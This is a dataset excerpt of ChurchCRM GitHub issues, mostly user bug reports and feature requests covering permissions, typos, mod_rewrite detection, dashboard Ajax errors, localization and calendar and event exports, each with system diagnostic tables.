issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 261k ⌀ | issue_title stringlengths 1 925 | issue_comments_url stringlengths 56 81 | issue_comments_count int64 0 2.5k | issue_created_at stringlengths 20 20 | issue_updated_at stringlengths 20 20 | issue_html_url stringlengths 37 62 | issue_github_id int64 387k 2.46B | issue_number int64 1 127k |
|---|---|---|---|---|---|---|---|---|---|
[
"ChurchCRM",
"CRM"
] | The user permissions for an admin are confusing because it says that you do not have permission to do anything
Collected Value Title | Data
----------------------|----------------
Page Name |/churchcrm/v2/user/1
Screen Size |1080x1920
Window Size |817x1592
Page Size |997x1592
Platform Information | Windows NT DESKTOP-5A2A1UB 10.0 build 19042 (Windows 10) AMD64
PHP Version | 7.4.7
SQL Version | 8.0.19
ChurchCRM Version |4.3.1
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Integrity check status |{"status":"success"}
| admin user permissions | https://api.github.com/repos/ChurchCRM/CRM/issues/5657/comments | 0 | 2021-02-24T14:31:51Z | 2021-02-25T08:38:23Z | https://github.com/ChurchCRM/CRM/issues/5657 | 815,533,680 | 5,657 |
[
"ChurchCRM",
"CRM"
] | On the page where you can select a skin there is a typo resulting in the string _Green/p>_
Collected Value Title | Data
----------------------|----------------
Page Name |/CRM/src/v2/user/1
Screen Size |1080x1920
Window Size |817x1592
Page Size |997x1592
Platform Information | Windows NT DESKTOP-5A2A1UB 10.0 build 19042 (Windows 10) AMD64
PHP Version | 7.4.7
SQL Version | 8.0.19
ChurchCRM Version |4.3.2
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Integrity check status |{"status":"failure","message":"Signature definition File Missing"}
| Skins typo | https://api.github.com/repos/ChurchCRM/CRM/issues/5655/comments | 0 | 2021-02-24T14:09:22Z | 2021-02-24T16:06:35Z | https://github.com/ChurchCRM/CRM/issues/5655 | 815,512,789 | 5,655 |
[
"ChurchCRM",
"CRM"
] | ## Description
Creating a directory report
The text in the disclaimer incorrectly uses the word _insure_ when it should be _ensure_
## Summary
- To _insure_ something or someone is to cover it with an insurance policy.
- To _ensure_ something is to make sure it happens—to guarantee it.
## Reference https://www.grammarly.com/blog/assure-ensure-insure
Collected Value Title | Data
----------------------|----------------
Page Name |/CRM/src/DirectoryReports.php
Screen Size |1080x1920
Window Size |886x1592
Page Size |1851x1592
Platform Information | Windows NT DESKTOP-5A2A1UB 10.0 build 19042 (Windows 10) AMD64
PHP Version | 7.4.7
SQL Version | 8.0.19
ChurchCRM Version |4.3.2
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Integrity check status |{"status":"failure","message":"Signature definition File Missing"}
| Insure or ensure | https://api.github.com/repos/ChurchCRM/CRM/issues/5653/comments | 0 | 2021-02-24T13:15:47Z | 2021-02-26T00:29:48Z | https://github.com/ChurchCRM/CRM/issues/5653 | 815,467,714 | 5,653 |
[
"ChurchCRM",
"CRM"
] | Clean install on a server with a known working mod_rewrite
churchCRM reports that mod_rewrite application prerequisites are not met.
Looking at the code I can see that it can never pass the first test as apache is using php as cgi not as a module
the second test referred to in the code does not appear to exist
the third test i have not debugged the exact code but a cli curl returns headers that look like they should pass
```
Headers : {[CRM_VERSION, 4.3.2], [Content-Length, 2524], [Content-Type, text/html; charset=UTF-8],
[Date, Wed, 24 Feb 2021 12:29:54 GMT]...}```
Collected Value Title | Data
----------------------|----------------
Page Name |/CRM/src/v2/admin/debug
Screen Size |1080x1920
Window Size |918x1920
Page Size |1517x1920
Platform Information | Windows NT DESKTOP-5A2A1UB 10.0 build 19042 (Windows 10) AMD64
PHP Version | 7.4.7
SQL Version | 8.0.19
ChurchCRM Version |4.3.2
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Integrity check status |{"status":"failure","message":"Signature definition File Missing"}
| mod_rewrite | https://api.github.com/repos/ChurchCRM/CRM/issues/5652/comments | 1 | 2021-02-24T12:31:34Z | 2021-02-25T04:44:19Z | https://github.com/ChurchCRM/CRM/issues/5652 | 815,434,640 | 5,652 |
[
"ChurchCRM",
"CRM"
] | I upgraded from 4.1.4 to 4.3.1. After upgrading I get a bunch of errors when I login. First of these errors is (others are similar):
DataTables warning: table id=updatedFamiliesDashboardItem - Invalid JSON response. For more information about this error, please see http://datatables.net/tn/1
The browser console shows the following errors (long list):
Can't find route for GET on http://[the crm url]/api/background/dashboard/page?currentpagename=/v2/dashboard
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows? Shared hosting Linux server
#### What browser (and version) are you running? Chrome (latest)
#### What version of PHP is the server running? 7.4
#### What version of SQL Server are you running? MySQL
#### What version of ChurchCRM are you running? 4.3.1
| Upgrade from 4.1.4 to 4.3.1 | https://api.github.com/repos/ChurchCRM/CRM/issues/5651/comments | 5 | 2021-02-24T11:19:08Z | 2023-11-01T17:36:57Z | https://github.com/ChurchCRM/CRM/issues/5651 | 815,381,991 | 5,651 |
[
"ChurchCRM",
"CRM"
] | This issue is present in the latest downloadable version and in the system nightly demo.
To replicate:
Create a new person, from the person view select "add to cart" and from the cart choose "empty cart to family".
Family name same as the person name, save and we are getting blank page.
https://demo.churchcrm.io/master/CartToFamily.php
This does however create a family (although WITHOUT members) and here demo and the v. 4.3.1 behave differently.
In my installation if I go to view the created family I'm getting:
/v2/family/2
Slim Application Error
A website error has occurred. Sorry for the temporary inconvenience.
and the demo is showing family entry just fine.
https://demo.churchcrm.io/master/v2/family/26
Server Platform | Linux DietPi 5.10.11-v7+ #1399 SMP Thu Jan 28 12:06:05 GMT 2021 armv7l
-- | --
ChurchCRM Database Version | 4.3.1
-- | --
Database Server Version | 5.5.5-10.3.27-MariaDB-0+deb10u1
-- | --
PHP Version | 7.3.27-1~deb10u1
| CartToFamily.php blank page and issues with created family | https://api.github.com/repos/ChurchCRM/CRM/issues/5647/comments | 3 | 2021-02-22T11:07:56Z | 2023-11-06T02:31:41Z | https://github.com/ChurchCRM/CRM/issues/5647 | 813,397,180 | 5,647 |
[
"ChurchCRM",
"CRM"
] | When attempting to view family, the following error is received.
"Slim Application Error
A website error has occurred. Sorry for the temporary inconvenience."
https://XXXXXX.org/churchcrm/v2/family/566
Version 4.3.1, PHP 7.3+, Linux, shared server
Installed via softaculous.
Collected Value Title | Data
----------------------|----------------
Page Name |/churchcrm/v2/people?familyActiveStatus=all
Screen Size |1080x1920
Window Size |903x1792
Page Size |1036x1792
Platform Information | Linux box5835.bluehost.com 4.14.121-197.ELK.el7.x86_64 #1 SMP Tue May 21 13:15:47 CDT 2019 x86_64
PHP Version | 7.3.27
SQL Version | 5.7.23-23
ChurchCRM Version |4.3.1
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Integrity check status |{"status":"success"}
| Slim Application Error - Family View | https://api.github.com/repos/ChurchCRM/CRM/issues/5645/comments | 1 | 2021-02-19T15:50:43Z | 2023-10-21T22:55:31Z | https://github.com/ChurchCRM/CRM/issues/5645 | 812,132,686 | 5,645 |
[
"ChurchCRM",
"CRM"
] | Most churches have age and gender grouping among the congregation such youth, young adults and men fellowship or men's wing and women's fellowship or women's wing. Like for instance for church we have age classifications like:
Children service(age <12),
junior youth(age >=12 && age <18)
youth (age >=18 && age <30),
Young Adults (age>=30 && age <40),
women fellowship (women of age >=40) and
men's fellowship(men of age>=40).
I believe this is unique for every church and some churches will fewer classifications. It the age and gender grouping could dynamic so that individual churches can change them according to their "church structure" it will help and also because this feature is not available a thirty old man who is a child because his parents are alive is put under Sunday School because of family role "child". | Age grouping | https://api.github.com/repos/ChurchCRM/CRM/issues/5644/comments | 3 | 2021-02-18T19:16:57Z | 2023-12-03T02:08:31Z | https://github.com/ChurchCRM/CRM/issues/5644 | 811,385,144 | 5,644 |
[
"ChurchCRM",
"CRM"
] | I can't see the logout button. Installed it via Softacolous
I click the avatar and the dropdown that pops up is empty
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/dashboard
Screen Size |640x360
Window Size |560x360
Page Size |1693x360
Platform Information | Linux server294.web-hosting.com 2.6.32-954.3.5.lve1.4.78.el6.x86_64 #1 SMP Thu Mar 26 08:20:27 EDT 2020 x86_64
PHP Version | 7.4.14
SQL Version | 10.3.27-MariaDB-log-cll-lve
ChurchCRM Version |4.3.1
Reporting Browser |Mozilla/5.0 (Linux; Android 8.1.0; SM-J710F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |mod_rewrite,mod_mime,mod_headers,mod_expires,mod_auth_basic | Logout button | https://api.github.com/repos/ChurchCRM/CRM/issues/5638/comments | 2 | 2021-02-13T19:24:55Z | 2021-02-25T08:37:37Z | https://github.com/ChurchCRM/CRM/issues/5638 | 807,812,489 | 5,638 |
[
"ChurchCRM",
"CRM"
] | #### On what page in the application did you find this issue? Every page.
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows? Debian linux , cloud server
#### What browser (and version) are you running? Chrome
#### What version of PHP is the server running? 7.4
#### What version of SQL Server are you running? 5.6.51
#### What version of ChurchCRM are you running? 4.3.1
**Problem:**
The translation function works when javascript using the i18n. However, the gettext() does not translate the text.
**Issue:**
in bootstrapper.php LINE 108: setlocale(LC_ALL, $localeInfo->getLocale());
the value of $localeInfo->getLocale() from the system Localization setting, sLanguage, does not match the installed language locale value in the server.
in my case, my system locale -a:
C
C.UTF-8
en_US.iso885915
en_US.utf8
POSIX
zh_CN.gb18030
zh_CN.gbk
zh_CN.utf8
zh_TW.euctw
zh_TW.utf8
the cloud server does not allow me to change the locale value therefore I cannot access to "zh_TW"
**Solution:**
file: /ChurchCRM/Bootstrapper.php
LINE 108:
```php
setlocale(LC_ALL, $localeInfo->getLocale());
```
change to
```php
setlocale(LC_ALL, $localeInfo->getLocale(), $localeInfo->getLocale().'.UTF-8', $localeInfo->getLocale().'.utf8');
```
this ways will search for possible Locale value in the system. It will work for most systems.
reference: https://www.php.net/manual/en/function.setlocale.php | Language LOCALE does not work using gettext but i18n works in javascript. | https://api.github.com/repos/ChurchCRM/CRM/issues/5637/comments | 3 | 2021-02-11T10:49:36Z | 2021-02-16T17:27:02Z | https://github.com/ChurchCRM/CRM/issues/5637 | 806,275,075 | 5,637 |
[
"ChurchCRM",
"CRM"
] | SSL has been enabled on my main site and also also been enabled in the general settings but it is still not working. URL shows that it is not secure.
Can you help?
Collected Value Title | Data
----------------------|----------------
Page Name |/dbmscrm/SystemSettings.php
Screen Size |1440x2560
Window Size |1547x1426
Page Size |1547x1426
Platform Information | Linux lwmi.org.uk 5.4.0-29-generic #33-Ubuntu SMP Wed Apr 29 14:32:27 UTC 2020 x86_64
PHP Version | 7.4.15
SQL Version | 5.5.5-10.3.27-MariaDB-1:10.3.27+maria~focal
ChurchCRM Version |4.0.5
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"failure","message":"One or more files failed signature validation","files":[{"filename":"ChurchCRM\/Bootstrapper.php","status":"Hash Mismatch","expectedhash":"18462b9dd6606f30fa80baff42d01b08e27513b2","actualhash":"2564182da68f78ef6e6cb458f19869175776c1fe"}]}
| SSL Issues | https://api.github.com/repos/ChurchCRM/CRM/issues/5635/comments | 3 | 2021-02-06T14:14:57Z | 2023-12-03T02:08:34Z | https://github.com/ChurchCRM/CRM/issues/5635 | 802,711,132 | 5,635 |
[
"ChurchCRM",
"CRM"
] | Just updated to 4.2.3 then 4.3.1 and in both updates I began to get ajax error messges on the main dashboard. The three error messages I get every time I go to the main dashboard or refresh the page on the main dashboard are:
DataTables warning: table id=updatedFamiliesDashboardItem - Ajax error. For more information about this error, please see http://datatables.net/tn/7
DataTables warning: table id=PersonBirthdayDashboardItem - Ajax error. For more information about this error, please see http://datatables.net/tn/7
DataTables warning: table id=FamiliesWithAnniversariesDashboardItem - Ajax error. For more information about this error, please see http://datatables.net/tn/7
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/dashboard
Screen Size |864x1536
Window Size |762x1536
Page Size |1519x1536
Platform Information | Linux gremlins.o2switch.net 3.10.0-962.3.2.lve1.5.27.el7.x86_64 #1 SMP Sat Nov 30 02:18:52 EST 2019 x86_64
PHP Version | 7.4.13
SQL Version | 10.0.38-MariaDB
ChurchCRM Version |4.3.1
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |mod_rewrite,mod_mime,mod_headers,mod_expires,mod_auth_basic | Ajax messages on main dashboard | https://api.github.com/repos/ChurchCRM/CRM/issues/5634/comments | 4 | 2021-01-24T14:47:23Z | 2023-11-27T02:07:21Z | https://github.com/ChurchCRM/CRM/issues/5634 | 792,812,138 | 5,634 |
[
"ChurchCRM",
"CRM"
] | When editing and saving existing family address, the updated record does not get saved in the database.
Collected Value Title | Data
----------------------|----------------
Page Name |/churchcrm/FamilyCustomFieldsEditor.php
Screen Size |1080x1920
Window Size |937x1920
Page Size |1033x1920
Platform Information | Linux graham.wznoc.com 3.10.0-1160.11.1.el7.x86_64 #1 SMP Fri Dec 18 16:34:56 UTC 2020 x86_64
PHP Version | 7.3.25
SQL Version | 5.5.5-10.3.27-MariaDB
ChurchCRM Version |4.2.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Integrity check status |{"status":"success"}
| Cannot edit family address | https://api.github.com/repos/ChurchCRM/CRM/issues/5632/comments | 1 | 2021-01-13T22:07:59Z | 2023-11-05T01:33:47Z | https://github.com/ChurchCRM/CRM/issues/5632 | 785,492,153 | 5,632 |
[
"ChurchCRM",
"CRM"
] | When creating a new user with privilege of only editing it's own family, when the user logs in, the user has access to everything like an admin. Expectation is to only be able to edit the details of its own family.
Collected Value Title | Data
----------------------|----------------
Page Name |/churchcrm/UserEditor.php
Screen Size |1080x1920
Window Size |880x1920
Page Size |1351x1920
Platform Information | Linux graham.wznoc.com 3.10.0-1160.11.1.el7.x86_64 #1 SMP Fri Dec 18 16:34:56 UTC 2020 x86_64
PHP Version | 7.3.25
SQL Version | 5.5.5-10.3.27-MariaDB
ChurchCRM Version |4.2.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Integrity check status |{"status":"success"}
| System User Security Bug | https://api.github.com/repos/ChurchCRM/CRM/issues/5630/comments | 2 | 2021-01-12T00:12:07Z | 2021-02-16T18:07:53Z | https://github.com/ChurchCRM/CRM/issues/5630 | 783,798,973 | 5,630 |
[
"ChurchCRM",
"CRM"
] | Nice to have the ability to export the list of church attendees using Copy/Excel/CSV/PDF/Print button when opening the list from church events.
Collected Value Title | Data
----------------------|----------------
Page Name |/churchcrm/EditEventAttendees.php
Screen Size |1080x1920
Window Size |880x1920
Page Size |880x1920
Platform Information | Linux graham.wznoc.com 3.10.0-1160.11.1.el7.x86_64 #1 SMP Fri Dec 18 16:34:56 UTC 2020 x86_64
PHP Version | 7.3.25
SQL Version | 5.5.5-10.3.27-MariaDB
ChurchCRM Version |4.2.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Integrity check status |{"status":"success"}
| Ability to export list of attendees | https://api.github.com/repos/ChurchCRM/CRM/issues/5629/comments | 2 | 2021-01-12T00:09:21Z | 2023-12-05T02:08:24Z | https://github.com/ChurchCRM/CRM/issues/5629 | 783,797,644 | 5,629 |
[
"ChurchCRM",
"CRM"
] | Exporting Church event list using Copy/Excel/CSV/PDF/Print button only exports the latest events in the month. Is it possible to export entire result whatever is displayed in the screen.
Collected Value Title | Data
----------------------|----------------
Page Name |/churchcrm/ListEvents.php
Screen Size |1080x1920
Window Size |880x1920
Page Size |880x1920
Platform Information | Linux graham.wznoc.com 3.10.0-1160.11.1.el7.x86_64 #1 SMP Fri Dec 18 16:34:56 UTC 2020 x86_64
PHP Version | 7.3.25
SQL Version | 5.5.5-10.3.27-MariaDB
ChurchCRM Version |4.2.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Integrity check status |{"status":"success"}
| Church event listing export | https://api.github.com/repos/ChurchCRM/CRM/issues/5628/comments | 2 | 2021-01-12T00:07:17Z | 2023-12-05T02:08:26Z | https://github.com/ChurchCRM/CRM/issues/5628 | 783,796,109 | 5,628 |
[
"ChurchCRM",
"CRM"
] | In the checkin page
The date is showing the most recent added event date instead of the date selected.
Eg in the following screenshot the event I selected is the new year service (3Jan2021) but above the Person it shows 31Jan2021 which is very confusing.
Thanks.
 | Event Checkin Date is mismatched | https://api.github.com/repos/ChurchCRM/CRM/issues/5627/comments | 3 | 2021-01-05T12:37:25Z | 2023-12-08T02:08:38Z | https://github.com/ChurchCRM/CRM/issues/5627 | 778,968,707 | 5,627 |
[
"ChurchCRM",
"CRM"
] | null | Attendance Report gender count | https://api.github.com/repos/ChurchCRM/CRM/issues/5626/comments | 13 | 2021-01-04T13:04:53Z | 2023-12-09T18:08:33Z | https://github.com/ChurchCRM/CRM/issues/5626 | 778,080,752 | 5,626 |
[
"ChurchCRM",
"CRM"
] | When viewing a Family i get the error
Slim Application Error
It is also showing when saving a family
Collected Value Title | Data
----------------------|----------------
Page Name |/FamilyEditor.php?FamilyID=1
Screen Size |812x375
Window Size |640x375
Page Size |2076x375
Platform Information | Linux s223.webhostingserver.nl 3.10.0-962.3.2.lve1.5.32.el6h.x86_64 #1 SMP Fri Feb 28 08:22:57 EST 2020 x86_64
PHP Version | 7.4.11
SQL Version | 5.5.5-10.4.17-MariaDB-log-cll-lve
ChurchCRM Version |4.3.1
Reporting Browser |Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 EdgiOS/45.11.11 Mobile/15E148 Safari/605.1.15
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |mod_rewrite,mod_mime,mod_headers,mod_expires,mod_auth_basic | Family view error | https://api.github.com/repos/ChurchCRM/CRM/issues/5625/comments | 8 | 2021-01-03T17:05:42Z | 2021-02-16T18:29:19Z | https://github.com/ChurchCRM/CRM/issues/5625 | 777,677,849 | 5,625 |
[
"ChurchCRM",
"CRM"
] | Hi Team,
Would be great to be able to add custom fields to self registration form, or include the category field. (The need is to know if a member is baptized, confirmed, or not yet...)
Many thanks | Add custom fields in self-registration form | https://api.github.com/repos/ChurchCRM/CRM/issues/5623/comments | 3 | 2020-12-28T22:47:51Z | 2023-12-09T02:04:59Z | https://github.com/ChurchCRM/CRM/issues/5623 | 775,616,283 | 5,623 |
[
"ChurchCRM",
"CRM"
] | None of the calendar events/birthdays/anniversaries/holidays show up in the calendar beginning in January 2021 (it's currently Dec 27th, 2020). I don't see any for 2019 either, so it may be that ChurchCRM is only showing calendar items for the current year.
Collected Value Title | Data
----------------------|----------------
Page Name |/SystemSettings.php
Screen Size |1080x1920
Window Size |964x1367
Page Size |1178x1367
Platform Information | Linux crm 4.15.0-126-generic #129-Ubuntu SMP Mon Nov 23 18:53:38 UTC 2020 x86_64
PHP Version | 7.2.24-0ubuntu0.18.04.7
SQL Version | 5.7.32-0ubuntu0.18.04.1
ChurchCRM Version |4.1.4
Reporting Browser |Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_socache_shmcb,mod_ssl,mod_status | Calendar items only showing up for current year | https://api.github.com/repos/ChurchCRM/CRM/issues/5620/comments | 3 | 2020-12-27T21:22:07Z | 2023-12-09T02:05:02Z | https://github.com/ChurchCRM/CRM/issues/5620 | 775,110,308 | 5,620 |
[
"ChurchCRM",
"CRM"
] | It will be if gender for adults and children can shown on attendance report that will help a lot | Attendance not showing demographics | https://api.github.com/repos/ChurchCRM/CRM/issues/5619/comments | 2 | 2020-12-25T22:12:13Z | 2023-12-10T02:10:13Z | https://github.com/ChurchCRM/CRM/issues/5619 | 774,790,857 | 5,619 |
[
"ChurchCRM",
"CRM"
] |
I am running on localhost on XAMPP for windows with php 7 and I am having issue with login after changing password I can login again with the new credentials. I am using version 4.3.1
| Login Error | https://api.github.com/repos/ChurchCRM/CRM/issues/5618/comments | 2 | 2020-12-25T22:08:59Z | 2021-02-22T06:14:19Z | https://github.com/ChurchCRM/CRM/issues/5618 | 774,790,613 | 5,618 |
[
"ChurchCRM",
"CRM"
] | I edited the Config.php file in the Includes directory via ssh connection. The code I used is 60 characters alphanumeric, with no special characters or underscores.
The task message in the GUI will not go away.
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/dashboard
Screen Size |846x412
Window Size |718x412
Page Size |1550x412
Platform Information | Linux p3plzcpnl435641.prod.phx3.secureserver.net 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24 01:42:00 EDT 2020 x86_64
PHP Version | 7.3.23
SQL Version | 5.6.49-cll-lve
ChurchCRM Version |4.3.1
Reporting Browser |Mozilla/5.0 (Linux; Android 9; SM-G955U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |mod_rewrite,mod_mime,mod_headers,mod_expires,mod_auth_basic | Secret Keys missing from Config.php | https://api.github.com/repos/ChurchCRM/CRM/issues/5614/comments | 2 | 2020-12-10T09:59:08Z | 2023-12-26T02:03:57Z | https://github.com/ChurchCRM/CRM/issues/5614 | 761,089,094 | 5,614 |
[
"ChurchCRM",
"CRM"
] | WIth PHP 8 released the current base images have moved to PHP 8. We need to lock PHP version to 7.4 until PHP 8 support works. | Docker Images uses PHP 8 | https://api.github.com/repos/ChurchCRM/CRM/issues/5599/comments | 0 | 2020-12-01T23:03:54Z | 2020-12-01T23:28:54Z | https://github.com/ChurchCRM/CRM/issues/5599 | 754,792,482 | 5,599 |
[
"ChurchCRM",
"CRM"
] | ```
7 failing
1) Admin People
Person Classifications Editor:
AssertionError: Timed out retrying: Expected to find content: 'Person Classifications Editor' but never did.
at Context.eval (http://127.0.0.1/__cypress/tests?p=cypress/integration/ui/admin/admin.people.spec.js:108:8)
2) Admin People
Family Roles Editor:
AssertionError: Timed out retrying: Expected to find content: 'Family Roles Editor' but never did.
at Context.eval (http://127.0.0.1/__cypress/tests?p=cypress/integration/ui/admin/admin.people.spec.js:113:8)
3) Admin People
Family Property List:
CypressError: `cy.visit()` failed trying to load:
http://127.0.0.1/?location=/PropertyList.php?Type=f
We attempted to make an http request to this URL but the request failed without a response.
We received this error at the network level:
> Error: ESOCKETTIMEDOUT
Common situations why this would fail:
- you don't have internet access
- you forgot to run / boot your web server
- your web server isn't accessible
- you have weird network configuration settings on your computer
at http://127.0.0.1/__cypress/runner/cypress_runner.js:157807:23
at visitFailedByErr (http://127.0.0.1/__cypress/runner/cypress_runner.js:157162:12)
at http://127.0.0.1/__cypress/runner/cypress_runner.js:157806:11
at tryCatcher (http://127.0.0.1/__cypress/runner/cypress_runner.js:10325:23)
at Promise._settlePromiseFromHandler (http://127.0.0.1/__cypress/runner/cypress_runner.js:8260:31)
at Promise._settlePromise (http://127.0.0.1/__cypress/runner/cypress_runner.js:8317:18)
at Promise._settlePromise0 (http://127.0.0.1/__cypress/runner/cypress_runner.js:8362:10)
``` | Cypress tests crash Travis CI server | https://api.github.com/repos/ChurchCRM/CRM/issues/5598/comments | 2 | 2020-12-01T23:03:03Z | 2023-10-22T00:36:29Z | https://github.com/ChurchCRM/CRM/issues/5598 | 754,792,044 | 5,598 |
[
"ChurchCRM",
"CRM"
] | Would be nice to have option from Person Listing to do a bulk Add to cart when filtering records from Search box. Same option to Bulk remove from Cart using the search filter. Thanks.
Collected Value Title | Data
----------------------|----------------
Page Name |/churchcrm/v2/people?familyActiveStatus=all
Screen Size |864x1536
Window Size |722x1536
Page Size |968x1536
Platform Information | Linux graham.wznoc.com 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64
PHP Version | 7.3.24
SQL Version | 5.5.5-10.3.27-MariaDB
ChurchCRM Version |4.2.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Integrity check status |{"status":"success"}
| Option for Bulk Add/Remove to Cart | https://api.github.com/repos/ChurchCRM/CRM/issues/5597/comments | 2 | 2020-12-01T11:05:37Z | 2023-12-11T02:08:20Z | https://github.com/ChurchCRM/CRM/issues/5597 | 754,297,162 | 5,597 |
[
"ChurchCRM",
"CRM"
] | Hi. Using latest version 4.2.3, the system holidays are off by 1 day. For example, Thanksgiving is listed as Wednesday, November 25, 2020. Christmas is listed as Thursday, December 24, 2020.
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/calendar
Screen Size |1080x1920
Window Size |969x1920
Page Size |969x1920
Platform Information | Linux spyrock 5.9.9-arch1-1 #1 SMP PREEMPT Wed, 18 Nov 2020 19:52:04 +0000 x86_64
PHP Version | 7.4.12
SQL Version | 8.0.21
ChurchCRM Version |4.2.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.47
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,http_core,prefork,mod_authn_file,mod_authn_core,mod_authz_host,mod_authz_groupfile,mod_authz_user,mod_authz_core,mod_access_compat,mod_auth_basic,mod_socache_shmcb,mod_reqtimeout,mod_include,mod_filter,mod_mime,mod_log_config,mod_env,mod_headers,mod_setenvif,mod_version,mod_slotmem_shm,mod_ssl,mod_unixd,mod_status,mod_autoindex,mod_negotiation,mod_dir,mod_userdir,mod_alias,mod_rewrite,mod_php7 | Holidays Off | https://api.github.com/repos/ChurchCRM/CRM/issues/5594/comments | 3 | 2020-11-29T22:15:42Z | 2023-12-28T02:03:58Z | https://github.com/ChurchCRM/CRM/issues/5594 | 753,029,958 | 5,594 |
[
"ChurchCRM",
"CRM"
] | Would be nice to have the Copy, Export and Print functionality from the list of attendees in the Event function.
Collected Value Title | Data
----------------------|----------------
Page Name |/churchcrm/EditEventAttendees.php
Screen Size |1080x1920
Window Size |937x1920
Page Size |937x1920
Platform Information | Linux graham.wznoc.com 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64
PHP Version | 7.3.24
SQL Version | 5.5.5-10.3.27-MariaDB
ChurchCRM Version |4.2.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Integrity check status |{"status":"success"}
| Export / Print Function in Event Attendees | https://api.github.com/repos/ChurchCRM/CRM/issues/5593/comments | 2 | 2020-11-29T21:49:15Z | 2023-12-19T02:07:38Z | https://github.com/ChurchCRM/CRM/issues/5593 | 753,024,455 | 5,593 |
[
"ChurchCRM",
"CRM"
] | When creating a new event and setting the date range to the same date but different time, the original datefrom changes when hovering the mouse to the calendar. Ie. set date from 1/1/2020 4pm to 1/1/2020 6pm, once you change the Date To field, the Date from changes as well.
Collected Value Title | Data
----------------------|----------------
Page Name |/churchcrm/v2/dashboard
Screen Size |864x1536
Window Size |722x1536
Page Size |1509x1536
Platform Information | Linux graham.wznoc.com 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64
PHP Version | 7.3.24
